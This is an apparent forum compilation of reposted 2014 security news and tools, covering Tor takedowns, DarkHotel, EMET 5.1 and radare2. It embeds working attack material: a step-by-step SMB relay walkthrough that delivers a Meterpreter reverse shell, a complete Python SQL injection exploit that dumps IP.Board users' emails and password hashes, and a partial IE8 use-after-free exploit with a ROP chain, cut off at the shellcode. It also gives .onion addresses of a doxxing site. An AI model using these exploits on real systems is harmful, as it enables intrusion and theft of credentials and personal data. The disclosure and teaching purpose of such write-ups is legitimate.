Nytro

SMB Relay Demystified and NTLMv2 Pwnage with Python Posted by eskoudis Filed under Metasploit, Methodology, Passwords, Python By Mark Baggett [Editor's Note: In this _excellent_ article, Mark Baggett explains in detail how the very powerful SMBRelay attack works and offers tips for how penetration testers can operationalize around it. And, bet yet, about 2/3rds of the way in, Mark shows how you can use a Python module to perform these attacks in an environment that uses only NTLMv2, a more secure Windows authentication mechanism. Really good stuff! --Ed.] The SMB Relay attack is one of those awesome tactics that really helps penetration testers demonstrate significant risk in a target organization; it is reliable, effective, and almost always works. Even when the organization has good patch management practices, the SMB Relay attack can still get you access to critical assets. Most networks have several automated systems that connect to all the hosts on the network to perform various management tasks. For example, software inventory systems, antivirus updates, nightly backups, software updates and patch management, desktop backups, event log collectors, and other processes will routinely connect to every host on the network, login with administrative credentials and perform some management function. In some organizations, active defense systems such as Antivirus Rogue host detection will immediately attempt to login to any host that shows up on the network. These systems will typically try long lists of administrative usernames and passwords as they try to gain access to the unknown host that has mysteriously appeared on the network. SMB Relay attacks allow us to grab these authentication attempts and use them to access systems on the network. In a way, SMB Relays are the network version of Pass the Hash attacks (which Ed Skoudis described briefly in the context of psexec in his Pen Tester's Pledge article). Let's look at how these attacks work. NTLM is a challenge/response protocol. The authentication happens something like this: First, the client attempts to login and the server responds with a challenge. In effect the server says, "If you are who you say you are, then encrypt this thing (Challenge X) with your hash." Next, the client encrypts the challenge and sends back the encrypted challenge response. The server then attempts to decrypt that encrypted challenge response with the user's password hash. If it decrypts to reveal the challenge that it sent, then the user is authenticated. Here is an illustration of a challenge/response authentication. With SMB Relay attacks, the attacker inserts himself into the middle of that exchange. The attacker selects the target server he wants to authenticate to and then the attacker waits for someone on the network to authenticate to his machine. This is where rogue host detection, vulnerability scanners, and administrator scripts that automatically authenticate to hosts become a penetration tester's best friends. When the automated process connects to the attacker, he passes the authentication attempt off to his target (another system on the network, perhaps a server). The target generates a challenge and sends it back to the attacker. The attacker sends the challenge back to the originating scanning system. The scanning system encrypts the hash with the correct password hash and sends it to the attacker. The attacker passes the correctly encrypted response back to his target and successfully authenticates. This process is shown in the next illustration. The BLUE arrows are the original communications and the RED arrows are slightly modified versions of those communications that the attacker is relaying to his target, so that he can gain access to it. Although this may seem complicated, it is actually very easy to exploit.In this example, the attacker (let's say he's at IP address 10.10.12.10) wants to gain access to the server at the IP address 10.10.12.20 (perhaps a juicy file server).There is a nightly software inventory process on the server at 10.10.12.19 that inventories all the hosts on the network. Scenario Attacker IP - 10.10.12.10 Target IP - 10.10.12.20 Nightly Inventory Scanner IP - 10.10.12.19 Metasploit has an SMB Relay Module and it works wonderfully. The attacker at 10.10.12.10 sets up Metasploit as follows: I'll use a simple Windows FOR loop to simulate an administrative server scanning the network and doing inventory. On host 10.10.12.19 I run the following command. When the scanner (10.10.12.19) connects to 10.10.12.10 (our Metasploit listener) the authentication attempt is relayed to the target server (10.10.12.20). The relayed authentication happens like magic and Metasploit automatically uses the authenticated SMB session to launch the meterpreter payload on the target. Notice in the figure below that Metasploit sends an "Access Denied" back to the inventory scanner when it attempted to connect to 10.10.12.10. However, the damage is done and we get a Meterpreter shell on the attacker's machine running on the target (10.10.12.20). Today, Metasploit's SMB Relay only supports NTLMv1, so organizations can protect themselves from this attack by changing the AD policy from this setting (available in secpol.msc) ... To this... After we make the change to NTLMv2, we try Metasploit again. Now when we run the exploit, Metasploit gets a "Failed to authenticate" error message. DRAT, our dastardly plan has been foiled by modern security protocols. Metasploit has support for NTLMv2 in other exploits such as http_ntlmrelay, so I imagine this exploit will eventually support NTLMv2. But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec atSANS Penetration Testing | Psexec Python Rocks! | SANS Institute) It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET! Getting the script running will take a little bit of work. You'll need to download the latest version of IMPACKET and fix the module paths to get it up and running. To fix this, I put all of the examples in the same directory as the other modules and then change the import statements to reflect the correct directories. SMBRELAYX needs an executable to run on the remote host after it authenticates. What could be better than the meterpreter? Let's use msfpayload to create a Meterpreter EXE and then setup SMBRELAYX. Smbrelayx.py requires two parameters: —h is the host you are going to attack and —e is the process to launch on the remote host. You just provide those options and sit back and wait for that inventory scanner to connect to your system. Below, I show msfpayload creating the Meterpreter executable, and the invocation of smbrelayx.py: Because we are using a meterpreter reverse shell, we also have to setup Metasploit so that it is ready to receive the payload connection after it executes on the target. That is what the multi/handler exploit is for, as shown below: Now, I'll simulate the scanner by attempting to connect to the C$ of our attacker's Linux box (10.10.12.10) from the scanner server (10.10.12.19). Instead of getting back an "Access Denied" like we did from Metasploit, we get back a "System cannot find the path specified" error. I like this error message. I think a system admin might question why his username and password didn't work on a target before he would question why the path doesn't exist. The smbrelayx.py script's message back to the admin seems therefore more subtle than the Metasploit message and less likely to get noticed. Immediately we see the relay occur in the Python script. It authenticates to 10.10.12.20 and launches the meterpreter process as a service using the username and password provided by 10.10.12.19. The payload is delivered to the target after authenticating over NTLMv2 and meterpreter is launched on the target. To keep our shell, we need to quickly migrate to another more stable process (to help automate that migration, we could use one of the migration scripts available for the meterpreter). Ah, the delicious smell of a brand new meterpreter shell. And of course, because it is a Python module, you can incorporate this script into your own automated attack tools. Would you like more information about how you can create your own Python-powered attack tools? I'm sure you do! Join me for my brand-new SANS course, SEC573 Python for Penetration tester. Python for Penetration Testers | Course | Python Penetration Testing Thank you! --Mark Baggett Sursa: SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute

Host a tor server entirely in RAM with Tor-ramdisk Hacker10 | 7 May, 2012 | Anonymity | No Comments Tor-ramdisk is a tiny Linux distribution (5MB) developed by the IT department at D’Youville College (USA) to securely host a tor proxy server in RAM memory, it can run in old diskless hardware and it will stop a forensic analysis from people stealing or seizing a tor server. In the event that a tor server is seized due to ignorance or calculated harassment, and it would not be the first time, the end user would still safe because the chained nature of the tor proxy network makes it impossible to find out someone’s computer IP by seizing a single server but other data, even if meaningless, can still be recovered, running tor in RAM is an extra security step that can help convince people that the machine is merely acting as a relay as it contains no hard drive. When a Tor-ramdisk server is powered down all the information is erased with no possibility of recovery, the tor configuration file and private encryption (torrc& secret_id_key) in between reboots can be preserved exporting and importing them using FTP or SSH making the life of a tor node operator easy. One disadvantage of running a tor node entirely in RAM memory is that it can not host hidden services as that requires hard drive space, other than it is a fully functional entry,middle or exit tor node. I would advise you to block all ports (USB,Firewire) in the server with epoxy, there are computer forensic tools that can be plugged into the USB port and make a copy of the RAM memory on the fly. You might have heard about the cold boot attack where someone with physical access to a recently switched off server or computer can still retrieve data remanence from RAM memory, this is not easy to achieve and the recovery timespan is comprised of a few seconds. Visit Tor-ramdisk homepage: Tor-ramdisk | opensource.dyc.edu Sursa: Host a tor server entirely in RAM with Tor-ramdisk | Hacker 10 - Security Hacker

ScyllaHide is an advanced open-source x64/x86 usermode Anti-Anti-Debug library. It hooks various functions in usermode to hide debugging. This tool is intended to stay in usermode (ring3). If you need kernelmode (ring0) Anti-Anti-Debug please see TitanHide https://bitbucket.org/mrexodia/titanhide. ScyllaHide supports various debuggers with plugins: OllyDbg v1 and v2 OllyDbg v1.10 x64_dbg x64_dbg or https://bitbucket.org/mrexodia/x64_dbg Hex-Rays IDA v6+ https://www.hex-rays.com/products/ida/ TitanEngine v2 https://bitbucket.org/mrexodia/titanengine-update and TitanEngine | Open Source | ReversingLabs PE x64 debugging is fully supported with plugins for x64_dbg and IDA. Please note: ScyllaHide is not limited to these debuggers. You can use the standalone commandline version of ScyllaHide. You can inject ScyllaHide in any process debugged by any debugger. More information is available in the documentation: https://bitbucket.org/NtQuery/scyllahide/downloads/ScyllaHide.pdf Source code license: GNU General Public License v3 https://www.gnu.org/licenses/gpl-3.0.en.html Special thanks to: What for his POISON Assembler source code https://tuts4you.com/download.php?view.2281 waliedassar for his blog posts waliedassar Peter Ferrie for his PDFs Homepage of Peter Ferrie MaRKuS-DJM for OllyAdvanced assembler source code MS Spy++ style Window Finder MS Spy++ style Window Finder - CodeProject Sursa: https://bitbucket.org/NtQuery/scyllahide

Deci, cine mai e interesat? Bucuresti. Avem ping-pong, biliard si "fun-room", saptamanal fotbal

[h=2]Tor Project Mulls How Feds Took Down Hidden Websites[/h] HughPickens.com writes: Jeremy Kirk writes at PC World that in the aftermath of U.S. and European law enforcement shutting down more than 400 websites (including Silk Road 2.0) which used technology that hides their true IP addresses, Tor users are asking: How did they locate the hidden services? "The first and most obvious explanation is that the operators of these hidden services failed to use adequate operational security," writes Andrew Lewman, the Tor project's executive director. For example, there are reports of one of the websites being infiltrated by undercover agents and one affidavit states various operational security errors." Another explanation is exploitation of common web bugs like SQL injections or RFIs (remote file inclusions). Many of those websites were likely quickly-coded e-shops with a big attack surface. Exploitable bugs in web applications are a common problem says Lewman adding that there are also ways to link transactions and deanonymize Bitcoin clients even if they use Tor. "Maybe the seized hidden services were running Bitcoin clients themselves and were victims of similar attacks." However the number of takedowns and the fact that Tor relays were seized could also mean that the Tor network was attacked to reveal the location of those hidden services. "Over the past few years, researchers have discovered various attacks on the Tor network. We've implemented some defenses against these attacks (PDF), but these defenses do not solve all known issues and there may even be attacks unknown to us." Another possible Tor attack vector could be the Guard Discovery attack. The guard node is the only node in the whole network that knows the actual IP address of the hidden service so if the attacker manages to compromise the guard node or somehow obtain access to it, she can launch a traffic confirmation attack to learn the identity of the hidden service. "We've been discussing various solutions to the guard discovery attack for the past many months but it's not an easy problem to fix properly. Help and feedback on the proposed designs is appreciated." According to Lewman, the task of hiding the location of low-latency web services is a very hard problem and we still don't know how to do it correctly. It seems that there are various issues that none of the current anonymous publishing designs have really solved. "In a way, it's even surprising that hidden services have survived so far. The attention they have received is minimal compared to their social value and compared to the size and determination of their adversaries." Sursa: Tor Project Mulls How Feds Took Down Hidden Websites - Slashdot

Pentru cei care se plang de vBulletin: "This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board."

Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery A new version of Robolinux is now ready for download By Silviu Stahie on November 10th, 2014 17:31 GMT Robolinux, a fast and easy to use Linux distribution based on Debian that uses both the GNOME and Xfce desktop environments, has been updated to version 7.7.1. Robolinux has made a name for itself by claiming that it can help users migrate from Windows to Linux without having to drop their favorite applications. A tool called Stealth VM Software has been developed to that effect and it basically lets users launch their apps in a Windows virtual environment. As you can imagine, this is not exactly easy to do and you will need a powerful operating system. Even so, it's still unclear what the legal status of the solution chosen by the developer is. As usual, each new Robolinux release is about something else, be it full hard disk encryption, Windows compatibility, or some other feature. This latest iteration of the operating system is about the integration of Popcorn Time and users’ ability to watch online movies and TV shows. The legal status of Robolinux 7.7.1 is now even more unclear The implementation of a Windows virtual environment is shady enough, especially for a Linux distro. Now, it looks like the developer has implemented Popcorn Time by default, which is illegal in many countries. Not everyone has a problem with the application, but some people might use it in countries where it’s breaking laws. "Now you can enjoy watching thousands of live streaming TV Shows & Movies instantly on your PC or laptop. You can even Chromecast them directly to your TV. The Fast as Greased Lightning Robolinux XFCE version 7.7.1 details: [Please note: The Live version password is 'live' all lower case.]" "We added Popcorn Time which requires the newest Debian 2.19 C libraries. We also added Xarchiver, so it is easier for our Users to create archive files in dozens of formats, DNS Utils, for SysAdmins & two more custom BCM Wifi Drivers. Plus all Debian upstream security updates along with the latest new and improved Debian stable Version 7.7 kernel and the newest Oracle VirtualBox version," writes the developer in the announcement. The Linux Live Creator Windows executable files have been added to the download section in the FAQ web page and Windows users will now be able to choose between Unetbootin and Linux Live Creator to install Robolinux from a USB stick. More details about the Stealth VM Software and Robolinux can be found in the official changelog. Also, you can download Robolinux 7.7.1 right now from Softpedia for both 32-bit and 64-bit architectures. Sursa: Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery - Softpedia

IP.Board <= 3.4.7 SQL Injection #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway () safe-mail net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable url = 'http://target.tld/forum/' ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re # <socks> - http://sourceforge.net/projects/socksipy/ #import socks, socket #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) #socket.socket = socks.socksocket # </socks> import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r n = inject('SELECT COUNT(*) FROM members') print '* Found %s users' % n for j in range(int(n)): print get('member_id', 'members', j) print get('name', 'members', j) print get('email', 'members', j) print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j) print '----------------' Sursa: Full Disclosure: IP.Board <= 3.4.7 SQL Injection

SQL Injection Vulnerability Patched in IP.Board Forum Software By Eduard Kovacs on November 10, 2014 Invision Power Services (IPS) has released patches to address an SQL injection vulnerability affecting versions 3.3.x and 3.4.x of the popular online forum software IP.Board. IPS learned of the existence of an exploit for the vulnerability on Sunday when it published a post advising users to disable the IPS Connect service, which allows multiple sites to share one login, by deleting the "interface/ipsconnect/ipsconnect.php" file from their installations. "Most clients will not need this service but if you do use it then we still suggest you temporarily disable until a fix is released tomorrow," IPS said. Patches and additional details on the SQL injection vulnerability were released a few hours later. According to developers, SQL injection attacks are possible on certain PHP configurations. "Although this exploit requires some knowledge of your configuration and for certain files to be web-readable, we felt it important to release an update," IPS explained. An exploit written in Python was published on several websites on Sunday. According to the author of the exploit, the error-based blind SQL injection flaw affects IP.Board version 3.4.7 and earlier. One of the administrators of the vpsBoard forum claims IPS only learned of the existence of the exploit after he notified them. A vpsBoard member said he successfully tested the exploit on his own website by knowing only the URL. "I ran the exploit against my IPB and it injected SQL just fine - no 'knowledge' was needed other than the URL," the user with the online moniker raindog308 said. IP.Board developers have also learned "that it may be possible to send attachments via the email classes which would ordinarily be removed." A fix for this issue, reported privately to IPS by Andrew Erb, is also included in the patches. The patches are automatically applied for IPS Community in the Cloud customers running IP.Board 3.3 or above. Users who have installed or upgraded their installations to version 3.4.7 after the patches were released don't need to take any action since the main download files have been updated. This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board. Sursa: SQL Injection Vulnerability Patched in IP.Board Forum Software | SecurityWeek.Com

[h=3]EMET 5.1 is available[/h] swiat 10 Nov 2014 8:45 AM Today, we’re releasing the Enhanced Mitigation Experience Toolkit (EMET) 5.1 which will continue to improve your security posture by providing increased application compatibility and hardened mitigations. You can download EMET 5.1 from microsoft.com/emet or directly from here. Following is the list of the main changes and improvements: Several application compatibility issues with Internet Explorer, Adobe Reader, Adobe Flash, and Mozilla Firefox and some of the EMET mitigations have been solved. Certain mitigations have been improved and hardened to make them more resilient to attacks and bypasses. Added “Local Telemetry” feature that allows to locally save memory dumps when a mitigation is triggered. All the changes in this release are listed in Microsoft KB Article 3015976. If you are using Internet Explorer 11, either on Windows 7 or Windows 8.1, and have deployed EMET 5.0, it is particularly important to install EMET 5.1 as compatibility issues were discovered with the November Internet Explorer security update and the EAF+ mitigation. Alternatively, you can temporarily disable EAF+ on EMET 5.0. Details on how to disable the EAF+ mitigation are available in the User Guide. In general we recommend upgrading to the latest version of EMET to benefit from all the enhancements. We want to particularly thank Luca Davi, Daniel Lehmann, and Ahmad-Reza Sadeghi from System Security Lab at Technical University Darmstadt/CASED, and René Freingruber form SEC Consult for partnering with us. Your feedback is always welcome as it helps us improve EMET with each new release, so we encourage you to reach out using the Connect Portal or by sending an email to emet_feedback@microsoft.com. - The EMET Team Sursa: EMET 5.1 is available - Security Research & Defense - Site Home - TechNet Blogs

Becoming a Hacker – Intangible Skills By Ethical Hacking Posted in: EH Tips, Hacking How to become a hacker has created a buzz among IT security students and professionals, people have selected ehacking.net (via email, comment, Tweets etc.) as their mentor and we will surely help you out till time. In the previous episode of this series, we have discussed the objective of this guide, education and skills that required and the method to become the master; and in this episode we will take a look into philosophical & Psychological side of a Penetration tester. You might be thinking that hacking process has nothing to do with philosophy & psychology but believe me it has; apart from the technical skills,the success of any hacking attack is also depends on the psyche of the attacker. Intangible Skills “Focus” is the key to get success in every aspect of life, be focused on what you want to achieve. Let's consider an example, you want to find a vulnerability in Facebook; you tried your level best, you were trying to achieve the objective but you failed. The word failure shows your weakness, so please hide it or destroy it; you can't fail until you keep trying. “You only fail when you accept your defeat” The foremost skill to become a penetration tester is never ever give-up and be focused in achieving your objective. If you will be able to develop this skill then take my word, “nobody can stop you to become a hacker/IT security expert”. Let's get back to the example; finding a vulnerability in Facebook takes time, patience, persistence, attention and believe me it is possible. Keep try until and unless you will get success, the same suggestion for this guide too; don't show impatience, read and implement. Are you developing the skills discussed in the first episode ? Have the mentor been selected yet ? Are you trying to become (focus) a hacker ? We have discussed many important points so far that could lead you to get the success, if you can understand these points. Attitude, Values, Culture Winning, success and achieving the objective are all the attitude of a hacker mindset; the value is to care and learn. Learning is very essential, you need to learn new skills, latest technology and everything, make reading your habit. Limited resources and unlimited wants; in hacking culture you have to believe that everything is possible, you yes you, the master of your own. Increase your capacity of learning, develop problem solving skills; start with basic mathematics, move to algorithm, functions and so on. Remember resources are limited but your wants are unlimited you need to fulfill your wants either by limiting your needs (not recommending) or increasing your capacity (highly recommended). Don't ever indulge yourself in the repetitive tasks which you will soon find boring, your attitude should show that you are creative; because you have the creativity to understand the working and process of everything and yes you can make amendment to enhance or destruct the system (this is your attitude). Freedom & Competency You need freedom, you want freedom and you love freedom; act this and demonstrate this. You are competent and you need to prove it; select your benchmark, work and achieve higher than this, judge and rate yourself. Make yourself prepared for the real competition, you should not afraid of competition; you are creative, you are competent (this is your value, and you have to prove). Develop and sharpen your core competency, your core competency is the one you do best and nobody can beat you. Make this world to believe in you by showing your competency, and you will become the mentor of many. Conclusion Lets close another chapter, I need your feedback; also I need to know how are you performing, are you getting the right direction ? Share your words. Incorporate the aforementioned skills in your daily life, if you just read and forget then you will achieve nothing; as discussed be focused, learn and implement. In the next article we will discuss the technical skills that required to become a hacker/information security professional. Image Credit Related post Hacking Hack an Isolated Computer - No Internet Connection Required Required Technical Skills to be a Hacker White House computer network 'hacked' Russia involved Hacking WPS - SILICA Wireless Assessments EH Tips Required Technical Skills to be a Hacker Bluetooth is Watching: Detect the Surveillance Systems Becoming a Hacker - What, How and Why Sursa: Becoming a Hacker – Intangible Skills | Ethical Hacking-Your Way To The World Of IT Security

[h=1]A Full Stack WYSIWYG Editor[/h] [h=1]for Network Packets[/h] [h=3]Edit L1 - L7 with just a few clicks[/h] [h=2]Features[/h] [h=3]Simple Interface[/h] Edit any packet at any layer from L1 to L7 with just a few mouse clicks. No hacking required. No need to look at Hex dumps. [h=3]Deep Understanding[/h] WireEdit knows all mandatory/optional elements of a packet, their data types, encoding, inter-dependency, position offsets, value constraints, checksums, etc. [h=3]Just works[/h] As you're editing WireEdit takes care of all the behind-the-scene details on the fly. No need to think about any of it. Sursa: https://wireedit.com/

Dark Net hackers steal seized site back from the FBI By Patrick Howell O'Neill Twitter on November 10, 2014 There's a tug of war at play on the Dark Net. Last week, American and European law enforcement triumphantly took control of 27 Dark Net websites last week in the highly publicized Operation Onymous, a campaign against a wide variety of Tor hidden services and their operators, including so-called Silk Road 2.0 and its alleged boss, 26-year-old Blake Benthall. Now, the new owners of one seized hidden website have taken their website back from police. The re-seized hidden service, Doxbin, is fully operational as of 1pm ET. Doxbin is a website dedicated to hosting tens of thousands of records containing sensitive information about private individuals, such as addresses, phone numbers, and Social Security Numbers. It’s made headlines numerous times, most notably recently when the judge in the trial of the original Silk Road, which was shuttered by the FBI last year, was threatened on the site, and her address, phone number, and personal details made public. The loss of Doxbin last week was mourned by the site’s fans. RIP doxbin pic.twitter.com/nFbrHoyVil — Anonymous (@blackplans) November 8, 2014 RIP Silk Road 2.0, doxbin, along with many other sites. Your legacy remains. pic.twitter.com/joT8aYyDad — john (@Anxieties) November 7, 2014 While police took control of the sites, the actual owners remain free and are speaking out in public. Earlier this weekend, they released aggregate log reports to the public in hopes that observers could identify the weakness that police used to seize the hidden service. Now, Doxbin's previous owners have handed off control of their website to an "interested party" who has re-seized the wesbite and at least three .onion addresses that direct to it, according to records at the hidden service search engine ahmia.fi. Moreover, the new owners have created a brand new.onion address in order to prevent police from re-seizing Doxbin. Anyone can currently access Doxbin at http://npieqpvpjhrmdchg.onion/ and http://doxbinumfxfyytnh.onion/, two previously seized addresses. Another .onion has been added at http://doxbinrqbk7lcslw.onion/. While the backbone required to take a website back from the police has been applauded by some observers, re-seizing the website isn’t necessarily challenging from a technical perspective. An .onion address is simply a hash of a private key used to control the domain. The previous owners handed the private key off and so now both police and the new owners of Doxbin possess the private key. That means that each can seize the domain at will, hence the game of tug of war. .@chobopeon The private_keys were handed to an interested party, who is playing tug of war with ICE/Eurolol. We're not involved — nachash (@loldoxbin) November 10, 2014 While the re-seizure is likely temporary, the website is now able to advertise a new and not-yet seized address to its old users. Last week, the website looked like this after police action: RIP DOXBIN pic.twitter.com/DW43ex4CCn — Jeb Boone (@JebBoone) November 7, 2014 Now, a mirror of the site called “THE INDESTRUCTIBLE SKY CASTLE,” revives the old Doxbin: Clarification: This article has been updated with new language to clarify ownership of the new Doxbin sites. Photo by David Goehring (CC BY 2.0) Sursa: Dark Net hackers steal seized site back from the FBI

Radare – The Reverse Engineering Framework Radare started out as a simple command line interface for a hexadecimal editor supporting 64 bit offsets to make searches and recovering data from hard-disks. It has evolved into a project that is composed of a hexadecimal editor as the central point of the project with assembler/disassembler, code analysis, scripting features, analysis and graphs of code and data and easy unix integration. Essentially, it has become a reverse engineering framework, with plugins and much more. radare2 itself is the core of the hexadecimal editor and debugger. Allows to open any kind of file from different IO access like disk, network, kernel plugins, remote devices, debugged processes and handle any of them as if they were a simple plain file. It implements an advanced command line interface for moving around the file, analyzing data, disassembling, binary patching, data comparision, searching, replacing, scripting with Ruby, Python, Lua and Perl. Features CLI and visual modes Yank and paste Perl/Python scripting support Virtual base address for on-disk patching vi-like environment and command repetition (3x) Debugger for x86-linux/bsd and arm-linux Data bookmarking (flags) Scripting (no branches or conditionals yet) Own magic database (rfile) Little/big endian conversions Data search Show xrefs on arm, x86 and ppc binaries Data type views Data block views Visual mode commands You can download radare here: radare2-0.9.7.tar.xz Or read more here – the author can be found on Twitter here @trufae. Sursa: Radare - The Reverse Engineering Framework - Darknet - The Darkside

“DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs Malware operators know in advance when targeted fat cats will check in and out. by Dan Goodin - Nov 10 2014, 11:20pm GTBST DeviantArt user: Tincho555 Researchers have uncovered a seven-year-old malware operation that combines advanced cryptographic attacks, zero-day exploits, and well-developed keyloggers to target elite executives staying in luxury hotels during business trips. The attackers behind "DarkHotel," as the advanced persistent threat has been dubbed, appear to know in advance when a targeted exec will check in and check out of a hotel. Victims are infected through a variety of methods, including bogus software updates for Adobe Flash, Google Toolbar, or other trusted software that are presented when the exec uses the hotel's Wi-Fi or wired Internet access. In many cases, the attack code is signed with a trusted digital certificate that the attackers were able to clone by factoring the underlying 512-bit private key. While factoring weak 512-bit keys has been practical for several years, the crypto attack nonetheless is an "advanced" capability, particularly a few years ago. Taken together, the characteristics are an indication the operators have some sophistication, said researchers from Kaspersky Lab, the Russia-based security firm that disclosed the campaign. "The fact that most of the time the victims are top executives indicates the attackers have knowledge of their victims whereabouts, including name and place of stay," the researchers wrote in a report published Monday. "This paints a dark, dangerous web in which unsuspecting travelers can easily fall. While the exact reason why some hotels function as an attacker vector are unknown, certain suspicions exist, indicating possibly a much larger compromise. We are still investigating this aspect of the operation and will publish more information in the future." Kaspersky researchers observed DarkHotel malware spreading in several undisclosed hotel networks when people connected to Wi-Fi were prompted to install counterfeit software updates. In other cases, targets are infected through spearphishing messages, some of which include attack code exploiting previously unknown vulnerabilities in Flash, Internet Explorer, or other types of software. Once infected by DarkHotel, computers will install various keyloggers or other forms of malware that are tailored to specific victims. The malware monitors passwords, communications, and system information on infected machines and periodically sends the data in encrypted form to servers controlled by the attackers. One of the things that makes the campaign unusual is its use of luxury hotel networks as a watering hole of sorts to target and infect high-value executives. The report stated: In this case, the Darkhotel attackers wait for their victim to connect to the Internet over the hotel Wi-Fi or the cable in their room. There is a very strong likelihood the targets will connect over these resources, and the attackers rely on that likelihood, much like at a watering hole. But the attackers also maintain truly precise targeting information over the victim’s visit, much like they would know a victim’s e-mail address and content interests in a spearphishing attack. While setting up the attack, the Darkhotel attackers knew the target’s expected arrival and departure times, room number, and full name, among other data. This data enables the attackers to present the malicious iframe precisely to that individual target. So, here we have yet another unique characteristic of this attacker—they employ a loosely certain but highly precise offensive approach. DarkHotel malware was also seeded to bittorrent feeds, where it was downloaded more than 30,000 times in less than six months. Kaspersky-owned network sensors have detected "thousands" of DarkHotel infections, mostly from the bittorrent feeds. Japan, Taiwan, China, Russia, and Korea were the five countries most affected by the malware. Enlarge Kaspersky Lab Much of the malware is or was cryptographically signed with digital certificates belonging to a trusted third party. All of the underlying private keys of the cloned certificates were generated using 512-bit md5 keys. The ability of attackers to factor the weak keys for use in such malware attacks has long been known, as advisories issued from Fox-IT, Microsoft, Mozilla, and Entrust warned in 2011. All the cloned keys have expired or been revoked. Signing code with trusted certificates helps eliminate warning messages that may be presented during installation. "All related cases of signed Darkhotel malware share the same Root Certificate Authority and Intermediate Certificate Authority that issued certificates with weak md5 keys (RSA 512 bits)," Monday's Kaspersky report stated. "We are confident that our Darkhotel threat actor fraudulently duplicated these certificates to sign its malware. These keys were not stolen." More recently, DarkHotel operators have stolen third-party certificates to sign their malware. Some of the DarkHotel malware samples date back to 2007. One file includes a keylogger designed to resemble a legitimate low-level Microsoft system device. Other components include a small downloader, an information stealer, a dropper and selfinjector, and a "selective infector" that infects executable files with an old-fashioned virus. Sursa: “DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs | Ars Technica

[h=1]Internet Explorer 8 MS14-035 Use-After-Free Exploit[/h] <!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010 // calc shellcode = 